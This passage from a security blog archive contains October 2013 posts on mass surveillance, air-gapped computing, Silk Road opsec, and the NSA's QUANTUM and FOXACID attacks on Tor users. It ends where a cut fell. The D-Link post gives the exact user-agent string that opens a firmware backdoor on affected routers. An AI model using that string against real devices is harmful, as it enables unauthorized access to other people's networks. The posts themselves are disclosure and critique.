Examples are everywhere. Internet companies like Google, Facebook, Amazon and Apple collect everything we do online at their sites. Third-party cookies allow those companies, and others, to collect data on us wherever we are on the Internet. Store affinity cards allow merchants to track our purchases. CCTV and aerial surveillance combined with automatic face recognition allow companies to track our movements; so does your cell phone. The Internet will facilitate even more surveillance, by more corporations for more purposes.

On the government side, surveillance has been on a path from individually targeted to broadly collected. When surveillance was manual and expensive, it could only be justified in extreme cases. The warrant process limited police surveillance, and resource restraints and the risk of discovery limited national intelligence surveillance. Specific individuals were targeted for surveillance, and maximal information was collected on them alone.

As technology improved, the government was able to implement ever-broadening surveillance. The National Security Agency could surveil groups—the Soviet government, the Chinese diplomatic corps, etc.—not just individuals. Eventually, they could spy on entire communications trunks.

Now, instead of watching one person, the NSA can monitor “three hops” away from that person—an ever widening network of people not directly connected to the person under surveillance. Using sophisticated tools, the NSA can surveil broad swaths of the Internet and phone network.

Governments have always used their authority to piggyback on corporate surveillance. Why should they go through the trouble of developing their own surveillance programs when they could just ask corporations for the data? For example we just learned that the NSA collects e-mail, IM and social networking contact lists for millions of Internet users worldwide.

But as corporations started collecting more information on populations, governments started demanding that data. Through National Security Letters, the FBI can surveil huge groups of people without obtaining a warrant. Through secret agreements, the NSA can monitor the entire Internet and telephone networks.

This is a huge part of the public-private surveillance partnership.

The result of all this is we’re now living in a world where both corporations and governments have us all under pretty much constant surveillance.

Data is a byproduct of the information society. Every interaction we have with a computer creates a transaction record, and we interact with computers hundreds of times a day. Even if we don’t use a computer—buying something in person with cash, say—the merchant uses a computer, and the data flows into the same system. Everything we do leaves a data shadow, and that shadow is constantly under surveillance.

Data is also a byproduct of information society socialization, whether it be e-mail, instant messages or conversations on Facebook. Conversations that used to be ephemeral are now recorded, and we are all leaving digital footprints wherever we go.

Moore’s law has made computing cheaper. All of us have made computing ubiquitous. And because computing produces data, and that data equals surveillance, we have created a world of ubiquitous surveillance.

Now we need to figure out what to do about it. This is more than reining in the NSA or fining a corporation for the occasional data abuse. We need to decide whether our data is a shared societal resource, a part of us that is inherently ours by right, or a private good to be bought and sold.

Writing in the Guardian, Chris Huhn said that “information is power, and the necessary corollary is that privacy is freedom.” How this interplay between power and freedom play out in the information age is still to be determined.

This essay previously appeared on CNN.com.

EDITED TO ADD (11/14): Richard Stallman’s comments on the subject.

Posted on October 21, 2013 at 6:05 AM60 Comments

D-Link Router Backdoor

Several versions of D-Link router firmware contain a backdoor. Just set the browser’s user agent string to “xmlset_roodkcableoj28840ybtide,” and you’re in. (Hint, remove the number and read it backwards.)

It was probably put there for debugging purposes, but has all sorts of applications for surveillance.

Good article on the subject.

EDITED TO ADD (11/14): There are open-source programs available to replace the firmware.

Posted on October 18, 2013 at 12:03 PM36 Comments

"A Court Order Is an Insider Attack"

Ed Felten makes a strong argument that a court order is exactly the same thing as an insider attack:

To see why, consider two companies, which we’ll call Lavabit and Guavabit. At Lavabit, an employee, on receiving a court order, copies user data and gives it to an outside party—in this case, the government. Meanwhile, over at Guavabit, an employee, on receiving a bribe or extortion threat from a drug cartel, copies user data and gives it to an outside party—in this case, the drug cartel.

From a purely technological standpoint, these two scenarios are exactly the same: an employee copies user data and gives it to an outside party. Only two things are different: the employee’s motivation, and the destination of the data after it leaves the company. Neither of these differences is visible to the company’s technology—it can’t read the employee’s mind to learn the motivation, and it can’t tell where the data will go once it has been extracted from the company’s system. Technical measures that prevent one access scenario will unavoidably prevent the other one.

This is why designing Lavabit to be resistant to court order would have been the right thing to do, and why we should all demand systems that are designed in this way.

Also on BoingBoing.

Posted on October 17, 2013 at 12:50 PM93 Comments

SecureDrop

SecureDrop is an open-source whistleblower support system, originally written by Aaron Swartz and now run by the Freedom of the Press Foundation. The first instance of this system was named StrongBox and is being run by The New Yorker. To further add to the naming confusion, Aaron Swartz called the system DeadDrop when he wrote the code.

I participated in a detailed security audit of the StrongBox implementation, along with some great researchers from the University of Washington and Jake Applebaum. The problems we found were largely procedural, and things that the Freedom of the Press Foundation are working to fix.

Freedom of the Press Foundation is not running any instances of SecureDrop. It has about a half dozen major news organization lined up, and will be helping them install their own starting the first week of November. So hopefully any would-be whistleblowers will soon have their choice of news organizations to securely communicate with.

Strong technical whistleblower protection is essential, especially given President Obama’s war on whistleblowers. I hope this system is broadly implemented and extensively used.

Posted on October 17, 2013 at 7:15 AM26 Comments

iPhone Sensor Surveillance

The new iPhone has a motion sensor chip, and that opens up new opportunities for surveillance:

The M7 coprocessors introduce functionality that some may instinctively identify as “creepy.” Even Apple’s own description hints at eerie omniscience: “M7 knows when you’re walking, running, or even driving…” While it’s quietly implemented within iOS, it’s not secret for third party apps (which require an opt-in through pop-up notification, and management through the phone’s Privacy settings). But as we know, most users blindly accept these permissions.

It all comes down to a question of agency in tracking our physical bodies.

The fact that my Fitbit tracks activity without matching it up with all my other data sources, like GPS location or my calendar, is comforting. These data silos can sometimes be frustrating when I want to query across my QS datasets, but the built-in divisions between data about my body ­—and data about the rest of my digital life—leave room for my intentional inquiry and interpretation.

Posted on October 16, 2013 at 7:33 AM33 Comments

New Secure Smart Phone App

It’s hard not to poke fun at this press release for Safeslinger, a new cell phone security app from Carnegie Mellon.

SafeSlinger provides you with the confidence that the person you are communicating with is actually the person they have represented themselves to be,” said Michael W. Farb, a research programmer at Carnegie Mellon CyLab. “The most important feature is that SafeSlinger provides secure messaging and file transfer without trusting the phone company or any device other than my own smartphone.”

Oddly, Farb believes that he can trust his smart phone.

This headline claims that “even [the] NSA can’t crack” it, but it’s unclear where that claim came from.

Still, it’s good to have encrypted chat programs. This one joins Cryptocat, Silent Circle, and my favorite: OTR.

Posted on October 15, 2013 at 12:37 PM29 Comments

Massive MIMO Cryptosystem

New paper: “Physical-Layer Cryptography Through Massive MIMO.”

Abstract: We propose the new technique of physical-layer cryptography based on using a massive MIMO channel as a key between the sender and desired receiver, which need not be secret. The goal is for low-complexity encoding and decoding by the desired transmitter-receiver pair, whereas decoding by an eavesdropper is hard in terms of prohibitive complexity. The decoding complexity is analyzed by mapping the massive MIMO system to a lattice. We show that the eavesdropper’s decoder for the MIMO system with M-PAM modulation is equivalent to solving standard lattice problems that are conjectured to be of exponential complexity for both classical and quantum computers. Hence, under the widely-held conjecture that standard lattice problems are hard to solve in the worst-case, the proposed encryption scheme has a more robust notion of security than that of the most common encryption methods used today such as RSA and Diffie-Hellman. Additionally, we show that this scheme could be used to securely communicate without a pre-shared secret and little computational overhead. Thus, the massive MIMO system provides for low-complexity encryption commensurate with the most sophisticated forms of application-layer encryption by exploiting the physical layer properties of the radio channel.

MIMO stands for “multiple-input multiple-output.” I had to look that up.

In general, I’m not optimistic about the security of these sorts of systems. Whenever non-cryptographers come up with cryptographic algorithms based on some novel problem that’s hard in their area of research, invariably there are pretty easy cryptographic attacks.

So consider this a good research exercise for all budding cryptanalysts out there.

Posted on October 15, 2013 at 6:27 AM32 Comments

Insecurities in the Linux /dev/random

New paper: “Security Analysis of Pseudo-Random Number Generators with Input: /dev/random is not Robust, by Yevgeniy Dodis, David Pointcheval, Sylvain Ruhault, Damien Vergnaud, and Daniel Wichs.

Abstract: A pseudo-random number generator (PRNG) is a deterministic algorithm that produces numbers whose distribution is indistinguishable from uniform. A formal security model for PRNGs with input was proposed in 2005 by Barak and Halevi (BH). This model involves an internal state that is refreshed with a (potentially biased) external random source, and a cryptographic function that outputs random numbers from the continually internal state. In this work we extend the BH model to also include a new security property capturing how it should accumulate the entropy of the input data into the internal state after state compromise. This property states that a good PRNG should be able to eventually recover from compromise even if the entropy is injected into the system at a very slow pace, and expresses the real-life expected behavior of existing PRNG designs. Unfortunately, we show that neither the model nor the specific PRNG construction proposed by Barak and Halevi meet this new property, despite meeting a weaker robustness notion introduced by BH. From a practical side, we also give a precise assessment of the security of the two Linux PRNGs, /dev/random and /dev/urandom. In particular, we show several attacks proving that these PRNGs are not robust according to our definition, and do not accumulate entropy properly. These attacks are due to the vulnerabilities of the entropy estimator and the internal mixing function of the Linux PRNGs. These attacks against the Linux PRNG show that it does not satisfy the “robustness” notion of security, but it remains unclear if these attacks lead to actual exploitable vulnerabilities in practice. Finally, we propose a simple and very efficient PRNG construction that is provably robust in our new and stronger adversarial model. We present benchmarks between this construction and the Linux PRNG that show that this construction is on average more efficient when recovering from a compromised internal state and when generating cryptographic keys. We therefore recommend to use this construction whenever a PRNG with input is used for cryptography.

Posted on October 14, 2013 at 1:06 PM121 Comments

New Low in Election Fraud

Azerbaijan achieves a new low in electoral fraud: the government accidentally publishes the results of the election before the polls open.

The mistake came when an electoral commission accidentally published results showing a victory for Ilham Aliyev, the country’s long-standing President, a day before voting. Meydan TV, an online channel critical of the government, released a screenshot from a mobile app for the Azerbaijan Central Election Commission which showed that Mr Aliyev had received 72.76 per cent of the vote compared with 7.4 per cent for the opposition candidate, Jamil Hasanli. The screenshot also indicates that the app displayed information about how many people voted at various times during the day. Polls opened at 8am.

Here’s another article.

But luckily, former US legislators are monitoring everything:

But observers from other delegations, including a group of former members of the United States House of Representatives, said the voting on Wednesday was clean and efficient. Mr. Aliyev, thanking voters in a televised statement, called the elections “free and transparent.”

Former Representative Michael E. McMahon, a Democrat from Staten Island, called the vote “honest, fair and really efficient.”

“There were much shorter lines than in America, and no hanging chads“—a reference to the disputed ballots in the United States presidential race in 2000.

Long lines? Hanging chads? These people have no idea how the big boys steal elections.

Posted on October 11, 2013 at 12:33 PM31 Comments

Air Gaps

Since I started working with Snowden’s documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.

I also recommended using an air gap, which physically isolates a computer or local network of computers from the Internet. (The name comes from the literal gap of air between the computer and the Internet; the word predates wireless networks.)

But this is more complicated than it sounds, and requires explanation.

Since we know that computers connected to the Internet are vulnerable to outside hacking, an air gap should protect against those attacks. There are a lot of systems that use—or should use—air gaps: classified military networks, nuclear power plant controls, medical equipment, avionics, and so on.

Osama Bin Laden used one. I hope human rights organizations in repressive countries are doing the same.

Air gaps might be conceptually simple, but they’re hard to maintain in practice. The truth is that nobody wants a computer that never receives files from the Internet and never sends files out into the Internet. What they want is a computer that’s not directly connected to the Internet, albeit with some secure way of moving files on and off.

But every time a file moves back or forth, there’s the potential for attack.

And air gaps have been breached. Stuxnet was a US and Israeli military-grade piece of malware that attacked the Natanz nuclear plant in Iran. It successfully jumped the air gap and penetrated the Natanz network. Another piece of malware named agent.btz, probably Chinese in origin, successfully jumped the air gap protecting US military networks.

These attacks work by exploiting security vulnerabilities in the removable media used to transfer files on and off the air-gapped computers.

Since working with Snowden’s NSA files, I have tried to maintain a single air-gapped computer. It turned out to be harder than I expected, and I have ten rules for anyone trying to do the same:

  1. When you set up your computer, connect it to the Internet as little as possible. It’s impossible to completely avoid connecting the computer to the Internet, but try to configure it all at once and as anonymously as possible. I purchased my computer off-the-shelf in a big box store, then went to a friend’s network and downloaded everything I needed in a single session. (The ultra-paranoid way to do this is to buy two identical computers, configure one using the above method, upload the results to a cloud-based anti-virus checker, and transfer the results of that to the air gap machine using a one-way process.)

  2. Install the minimum software set you need to do your job, and disable all operating system services that you won’t need. The less software you install, the less an attacker has available to exploit. I downloaded and installed OpenOffice, a PDF reader, a text editor, TrueCrypt, and BleachBit. That’s all. (No, I don’t have any inside knowledge about TrueCrypt, and there’s a lot about it that makes me suspicious. But for Windows full-disk encryption it’s that, Microsoft’s BitLocker, or Symantec’s PGPDisk—and I am more worried about large US corporations being pressured by the NSA than I am about TrueCrypt.)

  3. Once you have your computer configured, never directly connect it to the Internet again. Consider physically disabling the wireless capability, so it doesn’t get turned on by accident.

  4. If you need to install new software, download it anonymously from a random network, put it on some removable media, and then manually transfer it to the air-gapped computer. This is by no means perfect, but it’s an attempt to make it harder for the attacker to target your computer.

  5. Turn off all autorun features. This should be standard practice for all the computers you own, but it’s especially important for an air-gapped computer. Agent.btz used autorun to infect US military computers.

  6. Minimize the amount of executable code you move onto the air-gapped computer. Text files are best. Microsoft Office files and PDFs are more dangerous, since they might have embedded macros. Turn off all macro capabilities you can on the air-gapped computer. Don’t worry too much about patching your system; in general, the risk of the executable code is worse than the risk of not having your patches up to date. You’re not on the Internet, after all.

  7. Only use trusted media to move files on and off air-gapped computers. A USB stick you purchase from a store is safer than one given to you by someone you don’t know—or one you find in a parking lot.

  8. For file transfer, a writable optical disk (CD or DVD) is safer than a USB stick. Malware can silently write data to a USB stick, but it can’t spin the CD-R up to 1000 rpm without your noticing. This means that the malware can only write to the disk when you write to the disk. You can also verify how much data has been written to the CD by physically checking the back of it. If you’ve only written one file, but it looks like three-quarters of the CD was burned, you have a problem. Note: the first company to market a USB stick with a light that indicates a write operation—not read or write; I’ve got one of those—wins a prize.

  9. When moving files on and off your air-gapped computer, use the absolute smallest storage device you can. And fill up the entire device with random files. If an air-gapped computer is compromised, the malware is going to try to sneak data off it using that media. While malware can easily hide stolen files from you, it can’t break the laws of physics. So if you use a tiny transfer device, it can only steal a very small amount of data at a time. If you use a large device, it can take that much more. Business-card-sized mini-CDs can have capacity as low as 30 MB. I still see 1-GB USB sticks for sale.

  10. Consider encrypting everything you move on and off the air-gapped computer. Sometimes you’ll be moving public files and it won’t matter, but sometimes you won’t be, and it will. And if you’re using optical media, those disks will be impossible to erase. Strong encryption solves these problems. And don’t forget to encrypt the computer as well; whole-disk encryption is the best.

One thing I didn’t do, although it’s worth considering, is use a stateless operating system like Tails. You can configure Tails with a persistent volume to save your data, but no operating system changes are ever saved. Booting Tails from a read-only DVD—you can keep your data on an encrypted USB stick—is even more secure. Of course, this is not foolproof, but it greatly reduces the potential avenues for attack.

Yes, all this is advice for the paranoid. And it’s probably impossible to enforce for any network more complicated than a single computer with a single user. But if you’re thinking about setting up an air-gapped computer, you already believe that some very powerful attackers are after you personally. If you’re going to use an air gap, use it properly.

Of course you can take things further. I have met people who have physically removed the camera, microphone, and wireless capability altogether. But that’s too much paranoia for me right now.

This essay previously appeared on Wired.com.

EDITED TO ADD: Yes, I am ignoring TEMPEST attacks. I am also ignoring black bag attacks against my home.

Posted on October 11, 2013 at 6:45 AM245 Comments

A New Postal Privacy Product

The idea is basically to use indirection to hide physical addresses. You would get a random number to give to your correspondents, and the post office would use that number to determine your real address. No security against government surveillance, but potentially valuable nonetheless.

Here are a bunch of documents.

I honestly have no idea what’s going on. It seems to be something the US government is considering, but it was not proposed by the US Postal Service. This guy is proposing the service.

EDITED TO ADD (10/11): Sai has contacted me and asked that people refrain from linking to or writing about this for now, until he posts some more/better information. I’ll update this post with a new link when he sends it to me.

EDITED TO ADD (10/17): Sai has again contacted me, saying that he has posted the more/better information, and that the one true link for the proposal is here.

Posted on October 9, 2013 at 1:08 PM32 Comments

The NSA's New Risk Analysis

As I recently reported in the Guardian, the NSA has secret servers on the Internet that hack into other computers, codename FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and exposes flaws in how the agency thinks about the secrecy of its own programs.

Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack. According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head—all delivered from a FOXACID subsystem called Ferret Cannon. Oh how I love some of these code names. (On the other hand, EGOTISTICALGIRAFFE has to be the dumbest code name ever.)

Snowden explained this to Guardian reporter Glenn Greenwald in Hong Kong. If the target is a high-value one, FOXACID might run a rare zero-day exploit that it developed or purchased. If the target is technically sophisticated, FOXACID might decide that there’s too much chance for discovery, and keeping the zero-day exploit a secret is more important. If the target is a low-value one, FOXACID might run an exploit that’s less valuable. If the target is low-value and technically sophisticated, FOXACID might even run an already-known vulnerability.

We know that the NSA receives advance warning from Microsoft of vulnerabilities that will soon be patched; there’s not much of a loss if an exploit based on that vulnerability is discovered. FOXACID has tiers of exploits it can run, and uses a complicated trade-off system to determine which one to run against any particular target.

This cost-benefit analysis doesn’t end at successful exploitation. According to Snowden, the TAO—that’s Tailored Access Operations—operators running the FOXACID system have a detailed flowchart, with tons of rules about when to stop. If something doesn’t work, stop. If they detect a PSP, a personal security product, stop. If anything goes weird, stop. This is how the NSA avoids detection, and also how it takes mid-level computer operators and turn them into what they call “cyberwarriors.” It’s not that they’re skilled hackers, it’s that the procedures do the work for them.

And they’re super cautious about what they do.

While the NSA excels at performing this cost-benefit analysis at the tactical level, it’s far less competent at doing the same thing at the policy level. The organization seems to be good enough at assessing the risk of discovery—for example, if the target of an intelligence-gathering effort discovers that effort—but to have completely ignored the risks of those efforts becoming front-page news.

It’s not just in the U.S., where newspapers are heavy with reports of the NSA spying on every Verizon customer, spying on domestic e-mail users, and secretly working to cripple commercial cryptography systems, but also around the world, most notably in Brazil, Belgium, and the European Union. All of these operations have caused significant blowback—for the NSA, for the U.S., and for the Internet as a whole.

The NSA spent decades operating in almost complete secrecy, but those days are over. As the corporate world learned years ago, secrets are hard to keep in the information age, and openness is a safer strategy. The tendency to classify everything means that the NSA won’t be able to sort what really needs to remain secret from everything else. The younger generation is more used to radical transparency than secrecy, and is less invested in the national security state. And whistleblowing is the civil disobedience of our time.

At this point, the NSA has to assume that all of its operations will become public, probably sooner than it would like. It has to start taking that into account when weighing the costs and benefits of those operations. And it now has to be just as cautious about new eavesdropping operations as it is about using FOXACID exploits attacks against users.

This essay previously appeared in the Atlantic.

Posted on October 9, 2013 at 6:28 AM64 Comments

Why It's Important to Publish the NSA Programs

The Guardian recently reported on how the NSA targets Tor users, along with details of how it uses centrally placed servers on the Internet to attack individual computers. This builds on a Brazilian news story from a mid-September that, in part, shows that the NSA is impersonating Google servers to users; a German story on how the NSA is hacking into smartphones; and a Guardian story from early September on how the NSA is deliberately weakening common security algorithms, protocols, and products.

The common thread among these stories is that the NSA is subverting the Internet and turning it into a massive surveillance tool. The NSA’s actions are making us all less safe, because its eavesdropping mission is degrading its ability to protect the US.

Among IT security professionals, it has been long understood that the public disclosure of vulnerabilities is the only consistent way to improve security. That’s why researchers publish information about vulnerabilities in computer software and operating systems, cryptographic algorithms, and consumer products like implantable medical devices, cars, and CCTV cameras.

It wasn’t always like this. In the early years of computing, it was common for security researchers to quietly alert the product vendors about vulnerabilities, so they could fix them without the “bad guys” learning about them. The problem was that the vendors wouldn’t bother fixing them, or took years before getting around to it. Without public pressure, there was no rush.

This all changed when researchers started publishing. Now vendors are under intense public pressure to patch vulnerabilities as quickly as possible. The majority of security improvements in the hardware and software we all use today is a result of this process. This is why Microsoft’s Patch Tuesday process fixes so many vulnerabilities every month. This is why Apple’s iPhone is designed so securely. This is why so many products push out security updates so often. And this is why mass-market cryptography has continually improved. Without public disclosure, you’d be much less secure against cybercriminals, hacktivists, and state-sponsored cyberattackers.

The NSA’s actions turn that process on its head, which is why the security community is so incensed. The NSA not only develops and purchases vulnerabilities, but deliberately creates them through secret vendor agreements. These actions go against everything we know about improving security on the Internet.

It’s folly to believe that any NSA hacking technique will remain secret for very long. Yes, the NSA has a bigger research effort than any other institution, but there’s a lot of research being done—by other governments in secret, and in academic and hacker communities in the open. These same attacks are being used by other governments. And technology is fundamentally democratizing: today’s NSA secret techniques are tomorrow’s PhD theses and the following day’s cybercrime attack tools.

It’s equal folly to believe that the NSA’s secretly installed backdoors will remain secret. Given how inept the NSA was at protecting its own secrets, it’s extremely unlikely that Edward Snowden was the first sysadmin contractor to walk out the door with a boatload of them. And the previous leakers could have easily been working for a foreign government. But it wouldn’t take a rogue NSA employee; researchers or hackers could discover any of these backdoors on their own.

This isn’t hypothetical. We already know of government-mandated backdoors being used by criminals in Greece, Italy, and elsewhere. We know China is actively engaging in cyber-espionage worldwide. A recent Economist article called it “akin to a government secretly commanding lockmakers to make their products easier to pick—and to do so amid an epidemic of burglary.”

The NSA has two conflicting missions. Its eavesdropping mission has been getting all the headlines, but it also has a mission to protect US military and critical infrastructure communications from foreign attack. Historically, these two missions have not come into conflict. During the cold war, for example, we would defend our systems and attack Soviet systems.

But with the rise of mass-market computing and the Internet, the two missions have become interwoven. It becomes increasingly difficult to attack their systems and defend our systems, because everything is using the same systems: Microsoft Windows, Cisco routers, HTML, TCP/IP, iPhones, Intel chips, and so on. Finding a vulnerability—or creating one—and keeping it secret to attack the bad guys necessarily leaves the good guys more vulnerable.

Far better would be for the NSA to take those vulnerabilities back to the vendors to patch. Yes, it would make it harder to eavesdrop on the bad guys, but it would make everyone on the Internet safer. If we believe in protecting our critical infrastructure from foreign attack, if we believe in protecting Internet users from repressive regimes worldwide, and if we believe in defending businesses and ourselves from cybercrime, then doing otherwise is lunacy.

It is important that we make the NSA’s actions public in sufficient detail for the vulnerabilities to be fixed. It’s the only way to force change and improve security.

This essay previously appeared in the Guardian.

Posted on October 8, 2013 at 6:44 AM42 Comments

Silk Road Author Arrested Due to Bad Operational Security

Details of how the FBI found the administrator of Silk Road, a popular black market e-commerce site.

Despite the elaborate technical underpinnings, however, the complaint portrays Ulbricht as a drug lord who made rookie mistakes. In an October 11, 2011 posting to a Bitcoin Talk forum, for instance, a user called “altoid” advertised he was looking for an “IT pro in the Bitcoin community” to work in a venture-backed startup. The post directed applicants to send responses to “rossulbricht at gmail dot com.” It came about nine months after two previous posts—also made by a user, “altoid,” to shroomery.org and Bitcoin Talk—were among the first to advertise a hidden Tor service that operated as a kind of “anonymous amazon.com.” Both of the earlier posts referenced silkroad420.wordpress.com.

If altoid’s solicitation for a Bitcoin-conversant IT Pro wasn’t enough to make Ulbricht a person of interest in the FBI’s ongoing probe, other digital bread crumbs were sure to arouse agents’ suspicions. The Google+ profile tied to the rossulbricht@gmail.com address included a list of favorite videos originating from mises.org, a website of the “Mises Institute.” The site billed itself as the “world center of the Austrian School of economics” and contained a user profile for one Ross Ulbricht. Several Dread Pirate Roberts postings on Silk Road cited the “Austrian Economic theory” and the works of Mises Institute economists Ludwig von Mises and Murray Rothbard in providing the guiding principles for the illicit drug market.

The clues didn’t stop there. In early March 2012 someone created an account on StackOverflow with the username Ross Ulbricht and the rossulbricht@gmail.com address, the criminal complaint alleged. On March 16 at 8:39 in the morning, the account was used to post a message titled “How can I connect to a Tor hidden service using curl in php?” Less than one minute later, the account was updated to change the user name from Ross Ulbricht to “frosty.” Several weeks later, the account was again updated, this time to replace the Ulbricht gmail address with frosty@frosty.com. In July 2013, a forensic analysis of the hard drives used to run one of the Silk Road servers revealed a PHP script based on curl that contained code that was identical to that included in the Stack Overflow discussion, the complaint alleged.

We already know that it is next to impossible to maintain privacy and anonymity against a well-funded government adversary.

EDITED TO ADD (10/8): Another article.

Posted on October 7, 2013 at 1:35 PM73 Comments

How the NSA Attacks Tor/Firefox Users With QUANTUM and FOXACID

The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA‘s application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.

According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software. The trick identifies Tor users on the Internet and then executes an attack against their Firefox web browser.

The NSA refers to these capabilities as CNE, or computer network exploitation.

The first step of this process is finding Tor users. To accomplish this, the NSA relies on its vast capability to monitor large parts of the Internet. This is done via the agency’s partnership with US telecoms firms under programs codenamed Stormbrew, Fairview, Oakstar and Blarney.

The NSA creates “fingerprints” that detect HTTP requests from the Tor network to particular servers. These fingerprints are loaded into NSA database systems like XKeyscore, a bespoke collection and analysis tool that NSA boasts allows its analysts to see “almost everything” a target does on the Internet.

Using powerful data analysis tools with codenames such as Turbulence, Turmoil and Tumult, the NSA automatically sifts through the enormous amount of Internet traffic that it sees, looking for Tor connections.

Last month, Brazilian TV news show Fantastico showed screenshots of an NSA tool that had the ability to identify Tor users by monitoring Internet traffic.

The very feature that makes Tor a powerful anonymity service, and the fact that all Tor users look alike on the Internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.

After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FoxAcid, to infect the user’s computer. FoxAcid is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems.

Once the computer is successfully attacked, it secretly calls back to a FoxAcid server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information back to the NSA.

Exploiting the Tor browser bundle

Tor is a well-designed and robust anonymity tool, and successfully attacking it is difficult. The NSA attacks we found individually target Tor users by exploiting vulnerabilities in their Firefox browsers, and not the Tor application directly.

This, too, is difficult. Tor users often turn off vulnerable services like scripts and Flash when using Tor, making it difficult to target those services. Even so, the NSA uses a series of native Firefox vulnerabilities to attack users of the Tor browser bundle.

According to the training presentation provided by Snowden, EgotisticalGiraffe exploits a type confusion vulnerability in E4X, which is an XML extension for JavaScript. This vulnerability exists in Firefox 11.0—16.0.2, as well as Firefox 10.0 ESR—the Firefox version used until recently in the Tor browser bundle. According to another document, the vulnerability exploited by EgotisticalGiraffe was inadvertently fixed when Mozilla removed the E4X library with the vulnerability, and when Tor added that Firefox version into the Tor browser bundle, but NSA were confident that they would be able to find a replacement Firefox exploit that worked against version 17.0 ESR.

The Quantum system

To trick targets into visiting a FoxAcid server, the NSA relies on its secret partnerships with US telecoms companies. As part of the Turmoil system, the NSA places secret servers, codenamed Quantum, at key places on the Internet backbone. This placement ensures that they can react faster than other websites can. By exploiting that speed difference, these servers can impersonate a visited website to the target before the legitimate website can respond, thereby tricking the target’s browser to visit a Foxacid server.

In the academic literature, these are called “man-in-the-middle” attacks, and have been known to the commercial and academic security communities. More specifically, they are examples of “man-on-the-side” attacks.

They are hard for any organization other than the NSA to reliably execute, because they require the attacker to have a privileged position on the Internet backbone, and exploit a “race condition” between the NSA server and the legitimate website. This top-secret NSA diagram, made public last month, shows a Quantum server impersonating Google in this type of attack.

The NSA uses these fast Quantum servers to execute a packet injection attack, which surreptitiously redirects the target to the FoxAcid server. An article in the German magazine Spiegel, based on additional top secret Snowden documents, mentions an NSA developed attack technology with the name of QuantumInsert that performs redirection attacks. Another top-secret Tor presentation provided by Snowden mentions QuantumCookie to force cookies onto target browsers, and another Quantum program to “degrade/deny/disrupt Tor access”.

This same technique is used by the Chinese government to block its citizens from reading censored Internet content, and has been hypothesized as a probable NSA attack technique.

The FoxAcid system

According to various top-secret documents provided by Snowden, FoxAcid is the NSA codename for what the NSA calls an “exploit orchestrator,” an Internet-enabled system capable of attacking target computers in a variety of different ways. It is a Windows 2003 computer configured with custom software and a series of Perl scripts. These servers are run by the NSA’s tailored access operations, or TAO, group. TAO is another subgroup of the systems intelligence directorate.

The servers are on the public Internet. They have normal-looking domain names, and can be visited by any browser from anywhere; ownership of those domains cannot be traced back to the NSA.

However, if a browser tries to visit a FoxAcid server with a special URL, called a FoxAcid tag, the server attempts to infect that browser, and then the computer, in an effort to take control of it. The NSA can trick browsers into using that URL using a variety of methods, including the race-condition attack mentioned above and frame injection attacks.

FoxAcid tags are designed to look innocuous, so that anyone who sees them would not be suspicious. http://baseball2.2ndhalfplays.com/nested/attribs/bins/1/define/forms9952_z1zzz.html is an example of one such tag, given in another top-secret training presentation provided by Snowden.

There is no currently registered domain name by that name; it is just an example for internal NSA training purposes.

The training material states that merely trying to visit the homepage of a real FoxAcid server will not result in any attack, and that a specialized URL is required. This URL would be created by TAO for a specific NSA operation, and unique to that operation and target. This allows the FoxAcid server to know exactly who the target is when his computer contacts it.

According to Snowden, FoxAcid is a general CNE system, used for many types of attacks other than the Tor attacks described here. It is designed to be modular, with flexibility that allows TAO to swap and replace exploits if they are discovered, and only run certain exploits against certain types of targets.

The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target’s technical sophistication, the value of the exploit, and other considerations.

In the case of Tor users, FoxAcid might use EgotisticalGiraffe against their Firefox browsers.

According to a top-secret operational management procedures manual provided by Snowden, once a target is successfully exploited it is infected with one of several payloads. Two basic payloads mentioned in the manual are designed to collect configuration and location information from the target computer so an analyst can determine how to further infect the computer.

These decisions are made in part by the technical sophistication of the target and the security software installed on the target computer, called Personal Security Products or PSP, in the manual.

FoxAcid payloads are updated regularly by TAO. For example, the manual refers to version 8.2.1.1 of one of them.

FoxAcid servers also have sophisticated capabilities to avoid detection and to ensure successful infection of its targets. The operations manual states that a FoxAcid payload with the codename DireScallop can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot process.

The NSA also uses phishing attacks to induce users to click on FoxAcid tags.

TAO additionally uses FoxAcid to exploit callbacks—which is the general term for a computer infected by some automatic means—calling back to the NSA for more instructions and possibly to upload data from the target computer.

According to a top-secret operational management procedures manual, FoxAcid servers configured to receive callbacks are codenamed FrugalShot. After a callback, the FoxAcid server may run more exploits to ensure that the target computer remains compromised long term, as well as install “implants” designed to exfiltrate data.

By 2008, the NSA was getting so much FoxAcid callback data that they needed to build a special system to manage it all.

This essay previously appeared in the Guardian. It is the technical article associated with this more general-interest article. I also wrote two commentaries on the material.

EDITED TO ADD: Here is the source material we published. The Washington Post published its own story independently, based on some of the same source material and some new source material.

Here’s the official US government response to the story.

The Guardian decided to change the capitalization of the NSA codenames. They should properly be in all caps: FOXACID, QUANTUMCOOKIE, EGOTISTICALGIRAFFE, TURMOIL, and so on.

This is the relevant quote from the Spiegel article:

